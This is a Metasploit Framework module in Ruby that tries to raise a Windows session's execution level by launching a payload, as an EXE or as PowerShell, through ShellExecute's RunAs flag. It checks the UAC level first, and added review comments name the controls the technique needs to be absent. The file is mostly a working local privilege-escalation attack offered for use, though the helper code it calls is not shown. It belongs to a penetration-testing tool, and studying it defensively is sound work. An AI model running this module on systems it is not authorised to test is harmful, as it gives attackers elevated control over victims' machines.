GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/local/ask.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
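# Local module that asks Windows to start a payload at a higher execution
# level through ShellExecute's RunAs flag.
#
# As the status messages in #exploit show, this does not suppress the consent
# dialog: whenever UAC is enabled at a prompting level, the logged-on user is
# shown an elevation prompt and has to approve it. Keeping UAC at a prompting
# level, and treating an elevation prompt nobody asked for as suspicious, are
# therefore the controls this technique depends on being absent.
#
# NOTE(review): is_uac_enabled?, get_uac_level and UAC_NO_PROMPT presumably
# come from Post::Windows::Priv, and shell_execute_exe / shell_execute_psh
# from Post::Windows::Runas; neither mixin is visible here, confirm.
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Post::Windows::Priv
  include Post::Windows::Runas

  # Registers the module metadata and its user-settable options.
  #
  # @param info [Hash] metadata overrides, merged in through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Escalate UAC Execute RunAs',
        'Description' => %q{
          This module will attempt to elevate execution level using
          the ShellExecute undocumented RunAs flag to bypass low
          UAC settings.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'mubix', # Original technique
          'b00stfr3ak' # Added powershell option
        ],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Targets' => [['Windows', {}]],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2012-01-03',
        # NOTE(review): these three values are still the "unknown"
        # placeholders. The option help below describes a file placed on disk
        # and #exploit reports a prompt shown to the user, so
        # ARTIFACTS_ON_DISK and SCREEN_EFFECTS look like candidates for
        # 'SideEffects'; confirm against the mixin code before setting them.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([
      OptString.new('FILENAME', [false, 'File name on disk']),
      OptString.new('PATH', [false, 'Location on disk, %TEMP% used if not set']),
      OptEnum.new('TECHNIQUE', [true, 'Technique to use', 'EXE', %w[PSH EXE]]),
    ])
  end

  # Reports whether the elevation request will raise a consent prompt, then
  # hands off to the helper for the configured TECHNIQUE.
  #
  # @return [void]
  def exploit
    if is_uac_enabled?
      print_status 'UAC is Enabled, checking level...'
      case get_uac_level
      when UAC_NO_PROMPT
        # UAC is on here, only configured not to prompt. The message used to
        # read "UAC is not enabled", contradicting the status line above.
        print_good 'UAC is enabled but set to not prompt, no prompt for the user'
      else
        # Every other level needs the interactive user to approve the prompt.
        print_status "The user will be prompted, wait for them to click 'Ok'"
      end
    else
      print_good 'UAC is not enabled, no prompt for the user'
    end

    # TECHNIQUE is a required OptEnum limited to EXE and PSH, so one of the
    # two branches is expected to match.
    case datastore['TECHNIQUE']
    when 'EXE'
      shell_execute_exe(datastore['FILENAME'], datastore['PATH'])
    when 'PSH'
      shell_execute_psh
    end
  end
end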